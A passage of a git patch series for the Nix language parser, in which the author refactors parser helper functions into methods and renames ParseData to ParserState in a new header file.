$$ = new ExprLambda(CUR_POS, validateFormals(*data, $2), $5); } + { $$ = new ExprLambda(CUR_POS, data->validateFormals($2), $5); } | '{' formals '}' '@' ID ':' expr_function { auto arg = data->symbols.create($5); - $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $2, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $4, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -423,21 +429,21 @@ expr_op | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(data->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(makeCurPos(@2, data), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(makeCurPos(@2, data), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(makeCurPos(@2, data), $1, $3); } - | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(makeCurPos(@2, data), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } + | expr_op AND expr_op { $$ = new ExprOpAnd(data->makeCurPos(@2), $1, $3); } + | expr_op OR expr_op { $$ = new ExprOpOr(data->makeCurPos(@2), $1, $3); } + | expr_op IMPL expr_op { $$ = new ExprOpImpl(data->makeCurPos(@2), $1, $3); } + | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(data->makeCurPos(@2), $1, $3); } | expr_op '?' attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op - { $$ = new ExprConcatStrings(makeCurPos(@2, data), false, new std::vector >({{makeCurPos(@1, data), $1}, {makeCurPos(@3, data), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(makeCurPos(@2, data), new ExprVar(data->symbols.create("__div")), {$1, $3}); } - | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(makeCurPos(@2, data), $1, $3); } + { $$ = new ExprConcatStrings(data->makeCurPos(@2), false, new std::vector >({{data->makeCurPos(@1), $1}, {data->makeCurPos(@3), $3}})); } + | expr_op '-' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__sub")), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__mul")), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__div")), {$1, $3}); } + | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(data->makeCurPos(@2), $1, $3); } | expr_app ; @@ -476,12 +482,12 @@ expr_simple | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { - $$ = stripIndentation(CUR_POS, data->symbols, std::move(*$2)); + $$ = data->stripIndentation(CUR_POS, std::move(*$2)); delete $2; } | path_start PATH_END | path_start string_parts_interpolated PATH_END { - $2->insert($2->begin(), {makeCurPos(@1, data), $1}); + $2->insert($2->begin(), {data->makeCurPos(@1), $1}); $$ = new ExprConcatStrings(CUR_POS, false, $2); } | SPATH { @@ -520,13 +526,13 @@ string_parts string_parts_interpolated : string_parts_interpolated STR - { $$ = $1; $1->emplace_back(makeCurPos(@2, data), new ExprString(std::string($2))); } - | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $3); } - | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(makeCurPos(@1, data), $2); } + { $$ = $1; $1->emplace_back(data->makeCurPos(@2), new ExprString(std::string($2))); } + | string_parts_interpolated DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } + | DOLLAR_CURLY expr '}' { $$ = new std::vector>; $$->emplace_back(data->makeCurPos(@1), $2); } | STR DOLLAR_CURLY expr '}' { $$ = new std::vector>; - $$->emplace_back(makeCurPos(@1, data), new ExprString(std::string($1))); - $$->emplace_back(makeCurPos(@2, data), $3); + $$->emplace_back(data->makeCurPos(@1), new ExprString(std::string($1))); + $$->emplace_back(data->makeCurPos(@2), $3); } ; @@ -551,19 +557,19 @@ path_start ; ind_string_parts - : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $2); } - | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(makeCurPos(@2, data), $3); } + : ind_string_parts IND_STR { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $2); } + | ind_string_parts DOLLAR_CURLY expr '}' { $$ = $1; $1->emplace_back(data->makeCurPos(@2), $3); } | { $$ = new std::vector>>; } ; binds - : binds attrpath '=' expr ';' { $$ = $1; addAttr($$, std::move(*$2), $4, makeCurPos(@2, data), data->state); delete $2; } + : binds attrpath '=' expr ';' { $$ = $1; data->addAttr($$, std::move(*$2), $4, data->makeCurPos(@2)); delete $2; } | binds INHERIT attrs ';' { $$ = $1; for (auto & i : *$3) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - dupAttr(data->state, i.symbol, makeCurPos(@3, data), $$->attrs[i.symbol].pos); - auto pos = makeCurPos(@3, data); + data->dupAttr(i.symbol, data->makeCurPos(@3), $$->attrs[i.symbol].pos); + auto pos = data->makeCurPos(@3); $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); } delete $3; @@ -573,12 +579,12 @@ binds /* !!! Should ensure sharing of the expression in $4. */ for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) - dupAttr(data->state, i.symbol, makeCurPos(@6, data), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), makeCurPos(@6, data))); + data->dupAttr(i.symbol, data->makeCurPos(@6), $$->attrs[i.symbol].pos); + $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), data->makeCurPos(@6))); } delete $6; } - | { $$ = new ExprAttrs(makeCurPos(@0, data)); } + | { $$ = new ExprAttrs(data->makeCurPos(@0)); } ; attrs @@ -592,7 +598,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = data->state.positions[makeCurPos(@2, data)] + .errPos = data->state.positions[data->makeCurPos(@2)] }); } | { $$ = new AttrPath; } From 007605616477f4f0d8a0064c375b1d3cf6188ac5 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 265/654] move ParseData to own header, rename to ParserState ParserState better describes what this struct really is. the parser really does modify its state (most notably position and symbol tables), so calling it that rather than obliquely "data" (which implies being input only) makes sense. --- src/libexpr/lexer.l | 17 +- src/libexpr/parser-state.hh | 262 +++++++++++++++++++++++ src/libexpr/parser.y | 413 +++++++----------------------------- 3 files changed, 339 insertions(+), 353 deletions(-) create mode 100644 src/libexpr/parser-state.hh diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index 9addb3ae8..cfd61c90e 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -29,12 +29,7 @@ using namespace nix; namespace nix { -static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) -{ - return data->state.positions.add(data->origin, loc.first_line, loc.first_column); -} - -#define CUR_POS makeCurPos(*yylloc, data) +#define CUR_POS state->makeCurPos(*yylloc) static void initLoc(YYLTYPE * loc) { @@ -153,7 +148,7 @@ or { return OR_KW; } } catch (const boost::bad_lexical_cast &) { throw ParseError({ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); } return INT_LIT; @@ -163,7 +158,7 @@ or { return OR_KW; } if (errno != 0) throw ParseError({ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); return FLOAT_LIT; } @@ -186,7 +181,7 @@ or { return OR_KW; } /* It is impossible to match strings ending with '$' with one regex because trailing contexts are only valid at the end of a rule. (A sane but undocumented limitation.) */ - yylval->str = unescapeStr(data->symbols, yytext, yyleng); + yylval->str = unescapeStr(state->symbols, yytext, yyleng); return STR; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } @@ -214,7 +209,7 @@ or { return OR_KW; } return IND_STR; } \'\'\\{ANY} { - yylval->str = unescapeStr(data->symbols, yytext + 2, yyleng - 2); + yylval->str = unescapeStr(state->symbols, yytext + 2, yyleng - 2); return IND_STR; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } @@ -292,7 +287,7 @@ or { return OR_KW; } <> { throw ParseError({ .msg = hintfmt("path has a trailing slash"), - .errPos = data->state.positions[CUR_POS], + .errPos = state->state.positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh new file mode 100644 index 000000000..b33311743 --- /dev/null +++ b/src/libexpr/parser-state.hh @@ -0,0 +1,262 @@ +#pragma once + +#include "eval.hh" + +namespace nix { + +// using C a struct allows us to avoid having to define the special +// members that using string_view here would implicitly delete. +struct StringToken { + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } +}; + +struct ParserLocation { + int first_line, first_column; + int last_line, last_column; + + // backup to recover from yyless(0) + int stashed_first_line, stashed_first_column; + int stashed_last_line, stashed_last_column; + + void stash() { + stashed_first_line = first_line; + stashed_first_column = first_column; + stashed_last_line = last_line; + stashed_last_column = last_column; + } + + void unstash() { + first_line = stashed_first_line; + first_column = stashed_first_column; + last_line = stashed_last_line; + last_column = stashed_last_column; + } +}; + +struct ParserState { + EvalState & state; + SymbolTable & symbols; + Expr * result; + SourcePath basePath; + PosTable::Origin origin; + + void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); + void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); + void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); + Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); + Expr * stripIndentation(const PosIdx pos, + std::vector>> && es); + PosIdx makeCurPos(const ParserLocation & loc); +}; + +inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) +{ + throw ParseError({ + .msg = hintfmt("attribute '%1%' already defined at %2%", + showAttrPath(state.symbols, attrPath), state.positions[prevPos]), + .errPos = state.positions[pos] + }); +} + +inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) +{ + throw ParseError({ + .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), + .errPos = state.positions[pos] + }); +} + +inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) +{ + AttrPath::iterator i; + // All attrpaths have at least one attr + assert(!attrPath.empty()); + // Checking attrPath validity. + // =========================== + for (i = attrPath.begin(); i + 1 < attrPath.end(); i++) { + if (i->symbol) { + ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); + if (j != attrs->attrs.end()) { + if (!j->second.inherited) { + ExprAttrs * attrs2 = dynamic_cast(j->second.e); + if (!attrs2) dupAttr(attrPath, pos, j->second.pos); + attrs = attrs2; + } else + dupAttr(attrPath, pos, j->second.pos); + } else { + ExprAttrs * nested = new ExprAttrs; + attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); + attrs = nested; + } + } else { + ExprAttrs *nested = new ExprAttrs; + attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, nested, pos)); + attrs = nested; + } + } + // Expr insertion. + // ========================== + if (i->symbol) { + ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); + if (j != attrs->attrs.end()) { + // This attr path is already defined. However, if both + // e and the expr pointed by the attr path are two attribute sets, + // we want to merge them. + // Otherwise, throw an error. + auto ae = dynamic_cast(e); + auto jAttrs = dynamic_cast(j->second.e); + if (jAttrs && ae) { + for (auto & ad : ae->attrs) { + auto j2 = jAttrs->attrs.find(ad.first); + if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. + dupAttr(ad.first, j2->second.pos, ad.second.pos); + jAttrs->attrs.emplace(ad.first, ad.second); + } + jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); + } else { + dupAttr(attrPath, pos, j->second.pos); + } + } else { + // This attr path is not defined. Let's create it. + attrs->attrs.emplace(i->symbol, ExprAttrs::AttrDef(e, pos)); + e->setName(i->symbol); + } + } else { + attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, e, pos)); + } +} + +inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Symbol arg) +{ + std::sort(formals->formals.begin(), formals->formals.end(), + [] (const auto & a, const auto & b) { + return std::tie(a.name, a.pos) < std::tie(b.name, b.pos); + }); + + std::optional> duplicate; + for (size_t i = 0; i + 1 < formals->formals.size(); i++) { + if (formals->formals[i].name != formals->formals[i + 1].name) + continue; + std::pair thisDup{formals->formals[i].name, formals->formals[i + 1].pos}; + duplicate = std::min(thisDup, duplicate.value_or(thisDup)); + } + if (duplicate) + throw ParseError({ + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .errPos = state.positions[duplicate->second] + }); + + if (arg && formals->has(arg)) + throw ParseError({ + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .errPos = state.positions[pos] + }); + + return formals; +} + +inline Expr * ParserState::stripIndentation(const PosIdx pos, + std::vector>> && es) +{ + if (es.empty()) return new ExprString(""); + + /* Figure out the minimum indentation. Note that by design + whitespace-only final lines are not taken into account. (So + the " " in "\n ''" is ignored, but the " " in "\n foo''" is.) */ + bool atStartOfLine = true; /* = seen only whitespace in the current line */ + size_t minIndent = 1000000; + size_t curIndent = 0; + for (auto & [i_pos, i] : es) { + auto * str = std::get_if(&i); + if (!str || !str->hasIndentation) { + /* Anti-quotations and escaped characters end the current start-of-line whitespace. */ + if (atStartOfLine) { + atStartOfLine = false; + if (curIndent < minIndent) minIndent = curIndent; + } + continue; + } + for (size_t j = 0; j < str->l; ++j) { + if (atStartOfLine) { + if (str->p[j] == ' ') + curIndent++; + else if (str->p[j] == '\n') { + /* Empty line, doesn't influence minimum + indentation. */ + curIndent = 0; + } else { + atStartOfLine = false; + if (curIndent < minIndent) minIndent = curIndent; + } + } else if (str->p[j] == '\n') { + atStartOfLine = true; + curIndent = 0; + } + } + } + + /* Strip spaces from each line. */ + auto * es2 = new std::vector>; + atStartOfLine = true; + size_t curDropped = 0; + size_t n = es.size(); + auto i = es.begin(); + const auto trimExpr = [&] (Expr * e) { + atStartOfLine = false; + curDropped = 0; + es2->emplace_back(i->first, e); + }; + const auto trimString = [&] (const StringToken & t) { + std::string s2; + for (size_t j = 0; j < t.l; ++j) { + if (atStartOfLine) { + if (t.p[j] == ' ') { + if (curDropped++ >= minIndent) + s2 += t.p[j]; + } + else if (t.p[j] == '\n') { + curDropped = 0; + s2 += t.p[j]; + } else { + atStartOfLine = false; + curDropped = 0; + s2 += t.p[j]; + } + } else { + s2 += t.p[j]; + if (t.p[j] == '\n') atStartOfLine = true; + } + } + + /* Remove the last line if it is empty and consists only of + spaces. */ + if (n == 1) { + std::string::size_type p = s2.find_last_of('\n'); + if (p != std::string::npos && s2.find_first_not_of(' ', p + 1) == std::string::npos) + s2 = std::string(s2, 0, p + 1); + } + + es2->emplace_back(i->first, new ExprString(std::move(s2))); + }; + for (; i != es.end(); ++i, --n) { + std::visit(overloaded { trimExpr, trimString }, i->second); + } + + /* If this is a single string, then don't do a concatenation. */ + if (es2->size() == 1 && dynamic_cast((*es2)[0].second)) { + auto *const result = (*es2)[0].second; + delete es2; + return result; + } + return new ExprConcatStrings(pos, true, es2); +} + +inline PosIdx ParserState::makeCurPos(const ParserLocation & loc) +{ + return state.positions.add(origin, loc.first_line, loc.first_column); +} + +} diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index beb660e36..7ce493df5 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -5,9 +5,9 @@ %defines /* %no-lines */ %parse-param { void * scanner } -%parse-param { nix::ParseData * data } +%parse-param { nix::ParserState * state } %lex-param { void * scanner } -%lex-param { nix::ParseData * data } +%lex-param { nix::ParserState * state } %expect 1 %expect-rr 1 @@ -26,64 +26,11 @@ #include "eval.hh" #include "eval-settings.hh" #include "globals.hh" - -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } -}; - -namespace nix { +#include "parser-state.hh" #define YYLTYPE ::nix::ParserLocation - struct ParserLocation - { - int first_line, first_column; - int last_line, last_column; - - // backup to recover from yyless(0) - int stashed_first_line, stashed_first_column; - int stashed_last_line, stashed_last_column; - - void stash() { - stashed_first_line = first_line; - stashed_first_column = first_column; - stashed_last_line = last_line; - stashed_last_column = last_column; - } - - void unstash() { - first_line = stashed_first_line; - first_column = stashed_first_column; - last_line = stashed_last_line; - last_column = stashed_last_column; - } - }; - - struct ParseData - { - EvalState & state; - SymbolTable & symbols; - Expr * result; - SourcePath basePath; - PosTable::Origin origin; - - void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); - void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); - void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); - Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); - Expr * stripIndentation(const PosIdx pos, - std::vector>> && es); - PosIdx makeCurPos(const ParserLocation & loc); - }; - -} - #define YY_DECL int yylex \ - (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParseData * data) + (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParserState * state) #endif @@ -98,232 +45,14 @@ YY_DECL; using namespace nix; - -namespace nix { +#define CUR_POS state->makeCurPos(*yylocp) -void ParseData::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) -{ - throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", - showAttrPath(state.symbols, attrPath), state.positions[prevPos]), - .errPos = state.positions[pos] - }); -} - -void ParseData::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) -{ - throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), - .errPos = state.positions[pos] - }); -} - - -void ParseData::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) -{ - AttrPath::iterator i; - // All attrpaths have at least one attr - assert(!attrPath.empty()); - // Checking attrPath validity. - // =========================== - for (i = attrPath.begin(); i + 1 < attrPath.end(); i++) { - if (i->symbol) { - ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); - if (j != attrs->attrs.end()) { - if (!j->second.inherited) { - ExprAttrs * attrs2 = dynamic_cast(j->second.e); - if (!attrs2) dupAttr(attrPath, pos, j->second.pos); - attrs = attrs2; - } else - dupAttr(attrPath, pos, j->second.pos); - } else { - ExprAttrs * nested = new ExprAttrs; - attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); - attrs = nested; - } - } else { - ExprAttrs *nested = new ExprAttrs; - attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, nested, pos)); - attrs = nested; - } - } - // Expr insertion. - // ========================== - if (i->symbol) { - ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); - if (j != attrs->attrs.end()) { - // This attr path is already defined. However, if both - // e and the expr pointed by the attr path are two attribute sets, - // we want to merge them. - // Otherwise, throw an error. - auto ae = dynamic_cast(e); - auto jAttrs = dynamic_cast(j->second.e); - if (jAttrs && ae) { - for (auto & ad : ae->attrs) { - auto j2 = jAttrs->attrs.find(ad.first); - if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. - dupAttr(ad.first, j2->second.pos, ad.second.pos); - jAttrs->attrs.emplace(ad.first, ad.second); - } - jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); - } else { - dupAttr(attrPath, pos, j->second.pos); - } - } else { - // This attr path is not defined. Let's create it. - attrs->attrs.emplace(i->symbol, ExprAttrs::AttrDef(e, pos)); - e->setName(i->symbol); - } - } else { - attrs->dynamicAttrs.push_back(ExprAttrs::DynamicAttrDef(i->expr, e, pos)); - } -} - - -Formals * ParseData::validateFormals(Formals * formals, PosIdx pos, Symbol arg) -{ - std::sort(formals->formals.begin(), formals->formals.end(), - [] (const auto & a, const auto & b) { - return std::tie(a.name, a.pos) < std::tie(b.name, b.pos); - }); - - std::optional> duplicate; - for (size_t i = 0; i + 1 < formals->formals.size(); i++) { - if (formals->formals[i].name != formals->formals[i + 1].name) - continue; - std::pair thisDup{formals->formals[i].name, formals->formals[i + 1].pos}; - duplicate = std::min(thisDup, duplicate.value_or(thisDup)); - } - if (duplicate) - throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = state.positions[duplicate->second] - }); - - if (arg && formals->has(arg)) - throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = state.positions[pos] - }); - - return formals; -} - - -Expr * ParseData::stripIndentation(const PosIdx pos, - std::vector>> && es) -{ - if (es.empty()) return new ExprString(""); - - /* Figure out the minimum indentation. Note that by design - whitespace-only final lines are not taken into account. (So - the " " in "\n ''" is ignored, but the " " in "\n foo''" is.) */ - bool atStartOfLine = true; /* = seen only whitespace in the current line */ - size_t minIndent = 1000000; - size_t curIndent = 0; - for (auto & [i_pos, i] : es) { - auto * str = std::get_if(&i); - if (!str || !str->hasIndentation) { - /* Anti-quotations and escaped characters end the current start-of-line whitespace. */ - if (atStartOfLine) { - atStartOfLine = false; - if (curIndent < minIndent) minIndent = curIndent; - } - continue; - } - for (size_t j = 0; j < str->l; ++j) { - if (atStartOfLine) { - if (str->p[j] == ' ') - curIndent++; - else if (str->p[j] == '\n') { - /* Empty line, doesn't influence minimum - indentation. */ - curIndent = 0; - } else { - atStartOfLine = false; - if (curIndent < minIndent) minIndent = curIndent; - } - } else if (str->p[j] == '\n') { - atStartOfLine = true; - curIndent = 0; - } - } - } - - /* Strip spaces from each line. */ - auto * es2 = new std::vector>; - atStartOfLine = true; - size_t curDropped = 0; - size_t n = es.size(); - auto i = es.begin(); - const auto trimExpr = [&] (Expr * e) { - atStartOfLine = false; - curDropped = 0; - es2->emplace_back(i->first, e); - }; - const auto trimString = [&] (const StringToken & t) { - std::string s2; - for (size_t j = 0; j < t.l; ++j) { - if (atStartOfLine) { - if (t.p[j] == ' ') { - if (curDropped++ >= minIndent) - s2 += t.p[j]; - } - else if (t.p[j] == '\n') { - curDropped = 0; - s2 += t.p[j]; - } else { - atStartOfLine = false; - curDropped = 0; - s2 += t.p[j]; - } - } else { - s2 += t.p[j]; - if (t.p[j] == '\n') atStartOfLine = true; - } - } - - /* Remove the last line if it is empty and consists only of - spaces. */ - if (n == 1) { - std::string::size_type p = s2.find_last_of('\n'); - if (p != std::string::npos && s2.find_first_not_of(' ', p + 1) == std::string::npos) - s2 = std::string(s2, 0, p + 1); - } - - es2->emplace_back(i->first, new ExprString(std::move(s2))); - }; - for (; i != es.end(); ++i, --n) { - std::visit(overloaded { trimExpr, trimString }, i->second); - } - - /* If this is a single string, then don't do a concatenation. */ - if (es2->size() == 1 && dynamic_cast((*es2)[0].second)) { - auto *const result = (*es2)[0].second; - delete es2; - return result; - } - return new ExprConcatStrings(pos, true, es2); -} - - -PosIdx ParseData::makeCurPos(const ParserLocation & loc) -{ - return state.positions.add(origin, loc.first_line, loc.first_column); -} - -#define CUR_POS data->makeCurPos(*yylocp) - - -} - - -void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * error) +void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ .msg = hintfmt(error), - .errPos = data->state.positions[data->makeCurPos(*loc)] + .errPos = state->state.positions[state->makeCurPos(*loc)] }); } @@ -339,13 +68,13 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err nix::Formal * formal; nix::NixInt n; nix::NixFloat nf; - StringToken id; // !!! -> Symbol - StringToken path; - StringToken uri; - StringToken str; + nix::StringToken id; // !!! -> Symbol + nix::StringToken path; + nix::StringToken uri; + nix::StringToken str; std::vector * attrNames; std::vector> * string_parts; - std::vector>> * ind_string_parts; + std::vector>> * ind_string_parts; } %type start expr expr_function expr_if expr_op @@ -385,24 +114,24 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err %% -start: expr { data->result = $1; }; +start: expr { state->result = $1; }; expr: expr_function; expr_function : ID ':' expr_function - { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } + { $$ = new ExprLambda(CUR_POS, state->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { $$ = new ExprLambda(CUR_POS, data->validateFormals($2), $5); } + { $$ = new ExprLambda(CUR_POS, state->validateFormals($2), $5); } | '{' formals '}' '@' ID ':' expr_function { - auto arg = data->symbols.create($5); - $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($2, CUR_POS, arg), $7); + auto arg = state->symbols.create($5); + $$ = new ExprLambda(CUR_POS, arg, state->validateFormals($2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { - auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, data->validateFormals($4, CUR_POS, arg), $7); + auto arg = state->symbols.create($1); + $$ = new ExprLambda(CUR_POS, arg, state->validateFormals($4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -412,7 +141,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = data->state.positions[CUR_POS] + .errPos = state->state.positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -426,24 +155,24 @@ expr_if expr_op : '!' expr_op %prec NOT { $$ = new ExprOpNot($2); } - | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(data->symbols.create("__sub")), {new ExprInt(0), $2}); } + | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(data->makeCurPos(@2), new ExprVar(data->symbols.create("__lessThan")), {$1, $3})); } - | expr_op AND expr_op { $$ = new ExprOpAnd(data->makeCurPos(@2), $1, $3); } - | expr_op OR expr_op { $$ = new ExprOpOr(data->makeCurPos(@2), $1, $3); } - | expr_op IMPL expr_op { $$ = new ExprOpImpl(data->makeCurPos(@2), $1, $3); } - | expr_op UPDATE expr_op { $$ = new ExprOpUpdate(data->makeCurPos(@2), $1, $3); } + | expr_op '<' expr_op { $$ = new ExprCall(state->makeCurPos(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } + | 